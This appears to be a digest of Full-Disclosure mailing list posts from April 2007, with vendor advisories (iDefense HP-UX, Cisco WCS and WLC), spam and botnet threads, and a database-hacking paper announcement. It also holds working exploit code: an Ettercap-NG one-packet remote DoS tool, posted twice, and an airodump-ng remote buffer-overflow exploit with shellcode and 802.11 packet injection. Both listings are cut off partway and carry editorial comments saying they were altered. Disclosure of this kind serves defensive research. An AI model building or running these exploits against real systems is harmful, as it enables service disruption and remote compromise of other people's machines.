Re: [Full-disclosure] A Botted Fortune 500 a Day

2007-04-12 Thread Knud Erik Højgaard
On 4/13/07, RMueller <[EMAIL PROTECTED]> wrote:

> How is the information gathered?

The page mentions different types of spam, so it's really just a
matter of doing whois lookups / reverse dns checks and stuff like that
to see where the stuff comes from. Once you filter out all the end
user ranges you can easily do some manual sorting of the list to find
"juicy" stuff, aka things that are fun to laugh at.

--
Knud



[Full-disclosure] Ettercap-NG 0.7.3 Remote DoS

2007-04-12 Thread evilrabbi

/*
WARNING WARNING WARNING

THIS PACKAGE CONTAINS AN 0DAY.
NO ONE CAN BE HELD RESPONSIBLE IF THIS CODE RAPES YOUR SISTER OR
MOLESTS YOUR DOG.

WARNING WARNING WARNING


THE ONE PACKET ETTERCAP KILLER NOW IN A SMALLER PACKAGE!

If you want to know how this works then figure it out yourself.
Tested with Ettercap-NG v 0.7.3 on FreeBSD 6.1 and Slackware 10.1

greetz go out to tip, milkmang, chrak, jcb, rest of b4b0, mosthated,
xtaylor, and rest of global hell,riot, JxT,
 p00kie_p0x, tadp0le, #oldskewl, #ubergeeks, #wp, le_kickban for
fucking french women and anyone else I forgot..

REMEBER KIDS EVILRABBI LOVES YOU :*.

   gcc -Wall -o b4b0-ettercap  b4b0-ettercap.c
   ./b4b0-ettercap <target-host>

*/

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define IP  struct iphdr
#define TCP struct tcphdr

void usage();
unsigned short ipChecksum(unsigned short *ptr, int nbytes);

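/*
 * Print the banner and the command-line usage to stdout.
 *
 * In this copy of the listing the ASCII-art banner had been wrapped across
 * physical lines, leaving unterminated string literals that do not compile.
 * The banner is therefore reproduced as a compact text block carrying the
 * same information (team, program, target version, author, usage).
 *
 * The program takes exactly one argument, the host that will receive the
 * packet: main() requires argc == 2 and resolves argv[1] with
 * gethostbyname().
 */
void usage(void)
{
    int i;

    /* Scroll earlier terminal output off the screen, as the original did. */
    for (i = 0; i < 100; i++) {
        putchar('\n');
    }

    puts("T34M B4B0 PROUDLY PRESENTS: b4b0-ettercap.c");
    puts("ettercap-ng v0.7.3 Denial of Service");
    puts("by EvilRabbi");
    puts("");
    puts("usage: ./b4b0-ettercap <target-host>");
}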
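/*
 * Compute the 16-bit ones'-complement Internet checksum (RFC 1071) over
 * nbytes bytes starting at ptr.
 *
 * ptr     start of the data. It is read byte-wise through memcpy(), so the
 *         pointer need not be 2-byte aligned despite its declared type.
 * nbytes  length in bytes. An odd trailing byte is treated as the first
 *         byte of a zero-padded word; a length of 0 (or less) yields 0xffff.
 * returns the complemented 16-bit sum, in the same byte order as the input
 *         words, so it can be stored into a header without byte swapping.
 *
 * The copy of this listing in the corpus had the fold mask truncated to
 * "0x"; the intended constant is 0xffff.
 */
unsigned short ipChecksum(unsigned short *ptr, int nbytes)
{
    const unsigned char *bytes = (const unsigned char *)ptr;
    unsigned long sum = 0;
    unsigned short word;

    /* Sum the 16-bit words in memory order (same as the original's *ptr++). */
    while (nbytes > 1) {
        memcpy(&word, bytes, sizeof word);
        sum += word;
        bytes += 2;
        nbytes -= 2;
    }

    /* Odd trailing byte: it occupies the first byte of a zero-padded word. */
    if (nbytes == 1) {
        unsigned char pad[2] = { bytes[0], 0 };
        memcpy(&word, pad, sizeof word);
        sum += word;
    }

    /* Fold the carries back into 16 bits; two rounds are always enough. */
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);

    return (unsigned short)~sum;
}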

int main(int argc, char **argv)
{
   int sockfd, opt = 1;
   char tcpoptions[4];
   char dest[20];
   unsigned int pLen,sIPLen;
   unsigned char pkt[(pLen = sizeof(IP) + sizeof(TCP) + 4)];
   unsigned char ip[(sIPLen = 12 + sizeof(TCP) + 4)];
   struct hostent *he;
   struct sockaddr_in host;
   struct sockaddr_in s;

   struct in_addr etter;
   IP *iphdr = (IP *)pkt;
   TCP *tcphdr = (TCP *)((unsigned char *)pkt + sizeof(IP));

   if (getuid() != 0) {
   printf("you need to be r00t =(\n");
   exit(0);
   }

   if (argc != 2) {
   usage();
   exit(0);
   }
   if ((he=gethostbyname(argv[1])) == NULL) {  // get the host info
   herror("gethostbyname");
   exit(1);
   }
   snprintf (dest,sizeof(dest)-1,"%d.%d.%d.%d\n", (unsigned
char)he->h_addr_list[0][0],
(unsigned char)he->h_addr_list[0][1],
(unsigned
char)he->h_addr_list[0][2],
(unsigned
char)he->h_addr_list[0][3]);

   if ((sockfd = socket(AF_INET,SOCK_RAW,IPPROTO_TCP)) == -1) {
   perror("socket");
   exit(1);
   }
   setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&opt,sizeof(opt));

etter.s_addr = inet_addr(dest);
   s.sin_addr.s_addr = INADDR_ANY;
   //etter.s_addr = inet_addr("69.46.19.77");
   memset(tcpoptions,0,sizeof(tcpoptions));
   tcpoptions[0]=0x08;
   tcpoptions[1]=0x00;
   tcpoptions[2]=0x00;
   tcpoptions[3]=0x00;

   memset(&host, 0, sizeof(host));
   memset(pkt, 0, pLen);
   memcpy(pkt+sizeof(IP)+sizeof(TCP), tcpoptions, sizeof(tcpoptions));
   memset(ip, 0, sIPLen);
   *((unsigned long *)((unsigned char *)ip+0)) = s.sin_addr.s_addr;
   *((unsigned long *)((unsigned char *)ip+4)) = etter.s_addr;
   *((unsigned char *)((unsigned char *)ip+8)) = 0;
   *((unsigned char *)((unsigned char *)ip+9)) = IPPROTO_TCP;
 

[Full-disclosure] Ettercap-NG 0.7.3 Remote DoS

2007-04-12 Thread evilrabbi

/*
WARNING WARNING WARNING

THIS PACKAGE CONTAINS AN 0DAY.
NO ONE CAN BE HELD RESPONSIBLE IF THIS CODE RAPES YOUR SISTER OR
MOLESTS YOUR DOG.

WARNING WARNING WARNING


THE ONE PACKET ETTERCAP KILLER NOW IN A SMALLER PACKAGE!

If you want to know how this works then figure it out yourself.
Tested with Ettercap-NG v 0.7.3 on FreeBSD 6.1 and Slackware 10.1

greetz go out to tip, milkmang, chrak, jcb, rest of b4b0, mosthated,
xtaylor, and rest of global hell,riot, JxT,
 p00kie_p0x, tadp0le, #oldskewl, #ubergeeks, #wp, le_kickban for
fucking french women and anyone else I forgot..

REMEBER KIDS EVILRABBI LOVES YOU :*.

   gcc -Wall -o b4b0-ettercap  b4b0-ettercap.c
   ./b4b0-ettercap <target-host>

*/

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define IP  struct iphdr
#define TCP struct tcphdr

void usage();
unsigned short ipChecksum(unsigned short *ptr, int nbytes);

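/*
 * Print the banner and the command-line usage to stdout.
 *
 * In this copy of the listing the ASCII-art banner had been wrapped across
 * physical lines, leaving unterminated string literals that do not compile.
 * The banner is therefore reproduced as a compact text block carrying the
 * same information (team, program, target version, author, usage).
 *
 * The program takes exactly one argument, the host that will receive the
 * packet: main() requires argc == 2 and resolves argv[1] with
 * gethostbyname().
 */
void usage(void)
{
    int i;

    /* Scroll earlier terminal output off the screen, as the original did. */
    for (i = 0; i < 100; i++) {
        putchar('\n');
    }

    puts("T34M B4B0 PROUDLY PRESENTS: b4b0-ettercap.c");
    puts("ettercap-ng v0.7.3 Denial of Service");
    puts("by EvilRabbi");
    puts("");
    puts("usage: ./b4b0-ettercap <target-host>");
}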
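/*
 * Compute the 16-bit ones'-complement Internet checksum (RFC 1071) over
 * nbytes bytes starting at ptr.
 *
 * ptr     start of the data. It is read byte-wise through memcpy(), so the
 *         pointer need not be 2-byte aligned despite its declared type.
 * nbytes  length in bytes. An odd trailing byte is treated as the first
 *         byte of a zero-padded word; a length of 0 (or less) yields 0xffff.
 * returns the complemented 16-bit sum, in the same byte order as the input
 *         words, so it can be stored into a header without byte swapping.
 *
 * The copy of this listing in the corpus had the fold mask truncated to
 * "0x"; the intended constant is 0xffff.
 */
unsigned short ipChecksum(unsigned short *ptr, int nbytes)
{
    const unsigned char *bytes = (const unsigned char *)ptr;
    unsigned long sum = 0;
    unsigned short word;

    /* Sum the 16-bit words in memory order (same as the original's *ptr++). */
    while (nbytes > 1) {
        memcpy(&word, bytes, sizeof word);
        sum += word;
        bytes += 2;
        nbytes -= 2;
    }

    /* Odd trailing byte: it occupies the first byte of a zero-padded word. */
    if (nbytes == 1) {
        unsigned char pad[2] = { bytes[0], 0 };
        memcpy(&word, pad, sizeof word);
        sum += word;
    }

    /* Fold the carries back into 16 bits; two rounds are always enough. */
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);

    return (unsigned short)~sum;
}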

int main(int argc, char **argv)
{
   int sockfd, opt = 1;
   char tcpoptions[4];
   char dest[20];
   unsigned int pLen,sIPLen;
   unsigned char pkt[(pLen = sizeof(IP) + sizeof(TCP) + 4)];
   unsigned char ip[(sIPLen = 12 + sizeof(TCP) + 4)];
   struct hostent *he;
   struct sockaddr_in host;
   struct sockaddr_in s;

   struct in_addr etter;
   IP *iphdr = (IP *)pkt;
   TCP *tcphdr = (TCP *)((unsigned char *)pkt + sizeof(IP));

   if (getuid() != 0) {
   printf("you need to be r00t =(\n");
   exit(0);
   }

   if (argc != 2) {
   usage();
   exit(0);
   }
   if ((he=gethostbyname(argv[1])) == NULL) {  // get the host info
   herror("gethostbyname");
   exit(1);
   }
   snprintf (dest,sizeof(dest)-1,"%d.%d.%d.%d\n", (unsigned
char)he->h_addr_list[0][0],
(unsigned char)he->h_addr_list[0][1],
(unsigned
char)he->h_addr_list[0][2],
(unsigned
char)he->h_addr_list[0][3]);

   if ((sockfd = socket(AF_INET,SOCK_RAW,IPPROTO_TCP)) == -1) {
   perror("socket");
   exit(1);
   }
   setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&opt,sizeof(opt));

etter.s_addr = inet_addr(dest);
   s.sin_addr.s_addr = INADDR_ANY;
   //etter.s_addr = inet_addr("69.46.19.77");
   memset(tcpoptions,0,sizeof(tcpoptions));
   tcpoptions[0]=0x08;
   tcpoptions[1]=0x00;
   tcpoptions[2]=0x00;
   tcpoptions[3]=0x00;

   memset(&host, 0, sizeof(host));
   memset(pkt, 0, pLen);
   memcpy(pkt+sizeof(IP)+sizeof(TCP), tcpoptions, sizeof(tcpoptions));
   memset(ip, 0, sIPLen);
   *((unsigned long *)((unsigned char *)ip+0)) = s.sin_addr.s_addr;
   *((unsigned long *)((unsigned char *)ip+4)) = etter.s_addr;
   *((unsigned char *)((unsigned char *)ip+8)) = 0;
   *((unsigned char *)((unsigned char *)ip+9)) = IPPROTO_TCP;
 

Re: [Full-disclosure] patch-9449

2007-04-12 Thread mis
see

http://www.symantec.com/outbreak/spam-attack-zipped-trojan.html


On Thu, Apr 12, 2007 at 08:13:35PM -0500, Matti Ranta wrote:
> can you send it so we can dissect it?
> 
> thank you
> 
> On 4/12/07, Steward Smith <[EMAIL PROTECTED]> wrote:
> > Hi,
> >
> > Had a funny spam today that warned about mails coming from my IP address
> > and I should apply the attached patch. The filename was named
> > patch-9449.exe which was attached in a password protected zip file -
> > presumably to fool your virus scanner.
> >
> > I unpacked it but my up-to-date virus scanner on my Windows XP vmware
> > instance cannot detect any malware.
> >
> > Has anyone else seen this and know what it is?
> >
> > Stew
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> 
> 
> -- 
> Matti Ranta
> 
> This e-mail and any attachments may contain confidential and privileged
> information. If you are not the intended recipient, please notify the
> sender immediately by return e-mail, delete this e-mail and destroy any
> copies. Any dissemination or use of this information by a person other
> than the intended recipient is unauthorized and may be illegal.
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/



Re: [Full-disclosure] patch-9449

2007-04-12 Thread Matti Ranta
can you send it so we can dissect it?

thank you

On 4/12/07, Steward Smith <[EMAIL PROTECTED]> wrote:
> Hi,
>
> Had a funny spam today that warned about mails coming from my IP address
> and I should apply the attached patch. The filename was named
> patch-9449.exe which was attached in a password protected zip file -
> presumably to fool your virus scanner.
>
> I unpacked it but my up-to-date virus scanner on my Windows XP vmware
> instance cannot detect any malware.
>
> Has anyone else seen this and know what it is?
>
> Stew
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>


-- 
Matti Ranta

This e-mail and any attachments may contain confidential and privileged
information. If you are not the intended recipient, please notify the
sender immediately by return e-mail, delete this e-mail and destroy any
copies. Any dissemination or use of this information by a person other
than the intended recipient is unauthorized and may be illegal.



[Full-disclosure] patch-9449

2007-04-12 Thread Steward Smith
Hi,

Had a funny spam today that warned about mails coming from my IP address
and I should apply the attached patch. The filename was named
patch-9449.exe which was attached in a password protected zip file -
presumably to fool your virus scanner.

I unpacked it but my up-to-date virus scanner on my Windows XP vmware
instance cannot detect any malware.

Has anyone else seen this and know what it is?

Stew



[Full-disclosure] [Argeniss] Hacking Databases for owning your data (paper)

2007-04-12 Thread Cesar
Abstract:
Data theft is becoming a major threat: criminals have identified where
the money is. In recent years many databases of Fortune 500 companies
were compromised, causing large financial losses. This paper discusses
the data theft problem with a focus on database attacks. We show
current information on how serious the data theft problem is, explain
why you should care about database security, and describe common
attacks. The main part of the paper demonstrates unknown and not well
known attacks that can be used, or are being used, by criminals to
easily steal data from your databases. We focus on the most widely
used database servers, MS SQL Server and Oracle Database, and show how
to steal a complete database over the Internet, how to steal data
using a database rootkit and backdoor, and some advanced database 0day
exploits. We demonstrate that compromising databases is not a big deal
if they have not been properly secured. We also discuss how to protect
against these attacks so you can improve database security at your
site.

http://www.argeniss.com/research/HackingDatabases.zip
(Tools and exploits included)


Enjoy.

Cesar.


   




[Full-disclosure] A Botted Fortune 500 a Day

2007-04-12 Thread RMueller
Gadi wrote:

--

Message: 8
Date: Wed, 11 Apr 2007 21:35:47 -0500 (CDT)
From: Gadi Evron <[EMAIL PROTECTED]>
Subject: [Full-disclosure] A Botted Fortune 500 a Day
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED],
[EMAIL PROTECTED]
Message-ID: <[EMAIL PROTECTED]>
Content-Type: TEXT/PLAIN; charset=US-ASCII

Support Intelligence releases daily reports on different fortune 500
companies which are heavily affected by the botnet problem, with many
compromised machines on their networks.

You can find more information on their blog:
http://blog.support-intelligence.com/

They are good people, and they know botnets.

Gadi.



--


How is the information gathered? 



[Full-disclosure] Spam is funny!

2007-04-12 Thread neal.krawetz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

In my last article at Security Focus, I mentioned that phishing is
directed (based on your online profile) and not blast-o-gram
(everyone gets one). My example used Arizona. I said:

For example, if you are likely in Arizona then you are more
likely to receive an Arizona Credit Union phish. They can guess
where you are based on the forums you use. If you post in a Tucson
forum or write about Flagstaff and Phoenix, then you might be in
Arizona.


Well, the email address associated with that article just received
an Arizona State Credit Union phish. It had never received one of
those before.

Man, spammers are predictable and funny.

- - Dr Neal Krawetz, PhD
Author of "Yggdrasil Linux Unleashed" and "Other Stupid Shit"
-BEGIN PGP SIGNATURE-
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.5

wpwEAQECAAYFAkYelIEACgkQDpFP8dW5K4ZSdwQAjZjHeOH8WsgSLxe/atggwHeeS3JJ
G9YrofzEMHKjJwiw1qdDMzFHds9GhJAraCqSIUN1dgJfqphQB9nara5grgqjLmDfRLKP
+wFoCwFpgHVWtmVGRa5rDfdmI0Y/QyI1j554HM4JW3DSxZsvDv9GbR14b6NC4YWdJJ7Y
cZcNHv8=
=Sa1l
-END PGP SIGNATURE-



[Full-disclosure] iDefense Security Advisory 04.12.07: Hewlett Packard HP-UX Remote pfs_mountd.rpc Buffer Overflow Vulnerability

2007-04-12 Thread iDefense Labs
Hewlett Packard HP-UX Remote pfs_mountd.rpc Buffer Overflow Vulnerability

iDefense Security Advisory 04.12.07
http://labs.idefense.com/intelligence/vulnerabilities/
Apr 12, 2007

I. BACKGROUND

PFS (the Portable File System) allows mounting of ISO 9660, High Sierra,
and Rock Ridge (ISO 9660 with Rock Ridge extensions) CD-ROM disks. The
daemon pfs_mountd.rpc is an RPC extension that is launched along with
pfsd in order to allow the easy mounting of these file systems under
HP-UX. It is remotely accessible over TCP and UDP.

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in pfs_mountd.rpc
included in multiple versions of Hewlett Packard Co. HP-UX allows for
remote root access.

If a remote user sends two specially crafted packets over UDP, the
buffer overflow is triggered. One must first send a call to procedure
5, and soon thereafter send the actual payload to procedure 2. Due to
the closed nature of the pfs_mountd.rpc protocol specification, it is
unclear at this time what functions the respective procedures actually
perform.

III. ANALYSIS

The seriousness of this vulnerability is reduced by the fact that in
most cases an attacker will only have one chance at exploitation: a
failed attempt crashes the daemon, and it stays down until an
administrator restarts it. However, the attack works over UDP, so the
attacker can spoof the source address of the packets, possibly even
making them appear to originate from inside a trusted network.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in HP-UX
11.11i. It is suspected that previous versions are also vulnerable.

V. WORKAROUND

Firewall rules that filter on source address may not be enough to stop
this attack, because it is delivered over UDP and the source address
can be spoofed (see Section III).

VI. VENDOR RESPONSE

Hewlett-Packard discontinued support for the PFS on March 1st, 2004. As
a solution to this vulnerability, Hewlett-Packard recommends
discontinuing the use of PFS. More information is available from HP
Security Bulletin HPSBUX02203 at the following URL.

http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=c00913684

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

10/25/2004  Initial vendor notification
10/25/2004  Initial vendor response
12/19/2005  Second vendor notification
01/30/2007  Third vendor notification
04/12/2007  Coordinated public disclosure

IX. CREDIT

This vulnerability was discovered by iDefense Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.



Re: [Full-disclosure] A Botted Fortune 500 a Day

2007-04-12 Thread James Matthews

Maybe they can use this site also!

On 4/11/07, Gadi Evron <[EMAIL PROTECTED]> wrote:


Support Intelligence releases daily reports on different fortune 500
companies which are heavily affected by the botnet problem, with many
compromised machines on their networks.

You can find more information on their blog:
http://blog.support-intelligence.com/

They are good people, and they know botnets.

Gadi.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/






[Full-disclosure] Aircrack-ng (airodump-ng) remote buffer overflow vulnerability

2007-04-12 Thread jonnyboi
Product Name: Aircrack-ng (0.7)
Vendor: http://www.aircrack-ng.org
Date: 12 April, 2007
Author: Jonathan So < jonny [ @ ] nop-art [ dot ] net>
Advisory URL: http://www.nop-art.net/advisories/airodump-ng.txt

I. DESCRIPTION

A buffer overflow vulnerability has been found in airodump-ng, part of
the aircrack-ng package.  The vulnerability could allow an attacker to
transmit specially crafted 802.11 packets to execute arbitrary code on
a remote machine running the airodump-ng tool.

II. DETAILS

Airodump-ng fails to check the size of 802.11 authentication packets
before copying into an insufficiently sized global buffer.  As a result
it is possible to overwrite another global variable passed as the size
parameter to a subsequent memcpy() operation, in order to overflow a
stack buffer.  Airodump-ng must be logging packets with the -w or
--write option to be vulnerable to this attack.  The wireless device
must also be capturing packets in monitor mode.

This vulnerability has been successfully exploited on an x86 Linux
2.6.20 machine running airodump-ng 0.7.  Other versions and platforms
are also likely to be affected.

III. VENDOR RESPONSE

According to the vendor the vulnerability is now fixed in the latest
stable release.

IV. CREDIT

Discovered by Jonathan So
Additional thanks to Ash Willis

V. EXPLOIT

/**
 * airodump-exp.c - aircrack/airodump-ng (0.7) remote exploit
 *
 * Proof of concept exploit for a stack (and heap) based
 * overflow in airodump-ng.  The vulnerability can be exploited
 * by transmitting some specially crafted 802.11 packets to
 * execute arbitrary code on any machines within range
 * that are sniffing with a vulnerable version of airodump-ng.
 *
 * This exploit requires the lorcon 802.11 packet injection
 * library, see http://802.11ninja.net for details.
 *
 * Compiling:
 *
 *   gcc -o airodump-remote airodump-remote.c -lorcon
 *
 * Usage:
 *
 *   ./airodump-remote <interface> <driver> <channel> <header type> [return addr]
 *
 * Drivers supported by lorcon:
 *
 *   wlan-ng, hostap, airjack, prism54, madwifing, madwifiold,
 *   rtl8180, rt2570, rt2500, rt73, rt61, zd1211rw
 *
 * Header types:
 *
 *   0 - None (not tested)
 *   1 - Fake prism54 header
 *   2 - Fake radiotap header (not tested)
 *
 * Return addresses:
 *
 *   Backtrack Linux 2 (2.6.20) aircrack-ng 0.7 - 0x8054934
 *   Gentoo Linux (2.6.16) aircrack-ng 0.7 - 0x8055934
 *
 * Example usage:
 *
 *   ./airodump-remote wlan0 prism54 11 1 0x8054934
 *
 * Original advisory: http://www.nop-art.net/advisories/airodump-ng.txt
 * Author: Jonathan So [ jonny [ @ ] nop-art.net ]
 *
 * Copyright (C) 2007 Jonathan So
 */

#include 
#include 
#include 

// Payload delivered to the vulnerable airodump-ng process: Linux x86
// shellcode that issues sys_write on file descriptor 0 (ebx is zeroed)
// with a short message and then sys_exit. The exploit author notes that
// any shellcode fits here, NUL bytes included, up to 792 bytes (a limit
// this excerpt cannot confirm).
//
// Layout, as byte offsets from the start of the array:
//    0  jmp +0x14            -> lands on the call at offset 22
//    2  start: pop ecx       ; ecx = address of the message text
//       xor ebx,ebx ; xor edx,edx ; mov dl,0x1b (27-byte message)
//       xor eax,eax ; mov [ecx+edx],al (NUL-terminate the message)
//       mov al,4 ; int 0x80  ; sys_write(0, ecx, 27)
//       mov al,1 ; int 0x80  ; sys_exit
//   22  call start           -> pushes the address of the message text
//   27  message text (27 bytes) followed by the literal's NUL
char shellcode[] =
    "\xeb\x14"                      /* jmp   short +0x14 (get_message) */
    "\x59"                          /* pop   ecx                        */
    "\x31\xdb"                      /* xor   ebx, ebx                   */
    "\x31\xd2"                      /* xor   edx, edx                   */
    "\xb2\x1b"                      /* mov   dl, 0x1b (message length)  */
    "\x31\xc0"                      /* xor   eax, eax                   */
    "\x88\x04\x11"                  /* mov   [ecx+edx], al              */
    "\xb0\x04\xcd\x80"              /* mov   al, 4 ; int 0x80 (write)   */
    "\xb0\x01\xcd\x80"              /* mov   al, 1 ; int 0x80 (exit)    */
    "\xe8\xe7\xff\xff\xff"          /* call  start                      */
    "Stop sniffing our network!!";  /* message text                     */

int main(int argc, char **argv)
{
   tx80211_t tx;
   tx80211_packet_t txp;
   uint8_t packet[1044];
   uint8_t *ppacket;

   int headertype;
   unsigned ret_addr = 0x8054934;
   FILE *fp;

   if(argc<5) {
   printf("usage: %s
[ret_addr]\n", argv[0]);
   exit(1);
   }

   if(argc>5) {
   ret_addr = strtoul(argv[5], NULL, 16);
   }

   headertype = atoi(argv[4]);

   if ( tx80211_init(&tx, argv[1], tx80211_resolvecard(argv[2])) !=
TX80211_ENOERR) {
   fprintf(stderr, "Error initializing driver");
   return 1;
   }

   if (tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON) !=
TX80211_ENOERR) {
   fprintf(stderr, "Error setting inject mode\n");
   return 1;
   }

   if (tx80211_setchannel(&tx, atoi(argv[3])) < 0) {
   fprintf(stderr, "Error setting channel\n");
   }

   if (tx80211_open(&tx) < 0) {
   fprintf(stderr, "Unable to open interface\n");
   return 1;
   }

   txp.packet = packet;

   // Fill packet with nops
   memset(packet, 0x90, sizeof(packet));

   switch (headertype) {
   case 0:
   // No arptype, just send raw packet
   ppacket = packet;
   break;
   case 1:
   // Send fake prism header
   memcpy(packet+4, "\x08\x00\x00\x00", 4);
   ppacket = packet + 8;
   break;
   case 2:
   // Send fake radiotap header
   packet[0] = 0;
   packet[2] = 3;
   ppacket = packet + 3;
   break;
   default:
   printf("Invalid header type. Valid options are:\n");
   printf("  0 - none\n");
   printf("  1 - prism5

[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in the Cisco Wireless Control System

2007-04-12 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Multiple Vulnerabilities in the Cisco
Wireless Control System

Advisory ID: cisco-sa-20070412-wcs

http://www.cisco.com/warp/public/707/cisco-sa-20070412-wcs.shtml

Revision 1.0

For Public Release 2007 April 12 1600 UTC (GMT)

- -

Summary
===

The Cisco Wireless Control System (WCS) works in conjunction with
Cisco Aironet Lightweight Access Points, Cisco Wireless LAN
Controllers, and the Cisco Wireless Location Appliance by providing
tools for wireless LAN planning and design, system configuration,
location tracking, security monitoring, and wireless LAN management.
Cisco WCS contains multiple vulnerabilities that can result in
information disclosure, privilege escalation, and unauthorized access
through fixed authentication credentials.

Cisco has released free software updates that address these
vulnerabilities. Workarounds that mitigate these vulnerabilities are
available.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20070412-wcs.shtml.

Affected Products
=

This section provides details on affected products.

Vulnerable Products
+--

Versions of WCS prior to 4.0.96.0 are affected by one or more of
these vulnerabilities. To identify the first fixed version for a
specific Cisco Bug ID, please see the Software Versions and Fixes
section of this advisory.

To determine the version of WCS running in a given environment, take
the following steps:

 1. Log in to the WCS graphical web interface.
 2. From the menu, select Help > About the Software.

Products Confirmed Not Vulnerable
+

No other Cisco products are currently known to be affected by these
vulnerabilities.

Details
===

The Cisco Wireless Control System (WCS) works in conjunction with
Cisco Aironet Lightweight Access Points, Cisco Wireless LAN
Controllers, and the Cisco Wireless Location Appliance by providing
tools for wireless LAN planning and design, system configuration,
location tracking, security monitoring, and wireless LAN management.
Cisco WCS contains the following vulnerabilities:

Fixed FTP Credentials For WCS Location Backup
+

WCS can be configured to back up the data stored on the Cisco
Wireless Location Appliance via FTP. Affected versions of WCS include
a fixed user name and password for this backup operation; these
credentials cannot be changed or disabled. Knowledge of these
credentials, when combined with other properties of the FTP server,
could allow an attacker to read from and write to arbitrary files on
the server hosting the WCS application. In some cases, this could be
leveraged to alter system files and compromise the server. This
vulnerability is documented by Cisco Bug ID CSCse93014.

Account Group Privilege Escalation
+-

The WCS authentication system contains a privilege escalation
vulnerability that allows any user with a valid user name and
password to change their account group membership. For example, a
user in the "LobbyAmbassador" group can add themselves to the
"SuperUsers" group. This privilege escalation can allow full
administrative control of WCS and the wireless networks it manages.
This vulnerability is documented by Cisco Bug IDs CSCse78596 and
CSCsg05190.

Information Disclosure to Unauthenticated Users
+--

On affected versions of WCS, several directories within the WCS page
hierarchy are not password protected and could be accessed by an
unauthenticated user. Although the information available would not
allow an attacker to gain access to WCS, it would be possible to
obtain information about the organization of the network, including
access point locations. This vulnerability is documented by Cisco Bug
ID CSCsg04301.

Vulnerability Scoring Details
=

Cisco is providing scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS).

Cisco will provide a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.

Cisco PSIRT will set the bias in all cases to normal. Customers are
encouraged to apply the bias parameter when determining the
environmental impact of a particular vulnerability.

CVSS is a standards based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided an FAQ to answer additional questions regarding
CVSS at 
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html.

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at 
http://intellishield.cisco.com/security/alertmanager/cvss.

CSCse93014 - Fixed 

[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in the Cisco Wireless LAN Controller and Cisco Lightweight Access Points

2007-04-12 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Multiple Vulnerabilities in the Cisco
Wireless LAN Controller and Cisco Lightweight Access Points

Advisory ID: cisco-sa-20070412-wlc

http://www.cisco.com/warp/public/707/cisco-sa-20070412-wlc.shtml

Revision 1.0

For Public Release 2007 April 12 1600 UTC (GMT)

- -

Summary
===

The Cisco Wireless LAN Controller (WLC) manages Cisco Aironet access
points using the Lightweight Access Point Protocol (LWAPP). The WLC
contains multiple vulnerabilities that could result in a denial of
service (DoS) condition, information disclosure, or access control
list changes, or allow an attacker to gain full administrative
access.

Cisco has made free software available to address these
vulnerabilities for affected customers. There are workarounds available
to mitigate the effects of these vulnerabilities.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20070412-wlc.shtml.

Affected Products
=

This section provides details on affected products.

Vulnerable Products
+--

This section describes the vulnerable products.

Vulnerable Software
+--

The vulnerabilities addressed in this document affect versions 4.0,
3.2, and prior versions of the Wireless LAN Controller software. To
identify the first fixed version for a specific Cisco Bug ID, please
see the Software Versions and Fixes section of this advisory.

To determine the version of WLC running in a given environment, use
one of the following methods:

  * In the web interface, choose the Monitor tab, click Summary in
the left-hand pane, and note the "Software Version."
  * From the command-line interface, type show sysinfo and note the
"Product Version."

Vulnerable Hardware
+--

Wireless LAN Controllers

  * Cisco 4400 Series Wireless LAN Controllers
  * Cisco 2100 Series Wireless LAN Controllers
  * Cisco Wireless LAN Controller Module

Wireless Integrated Switches and Routers

  * Cisco Catalyst 6500 Series Wireless Services Module (WiSM)
  * Cisco Catalyst 3750 Series Integrated Wireless LAN Controllers
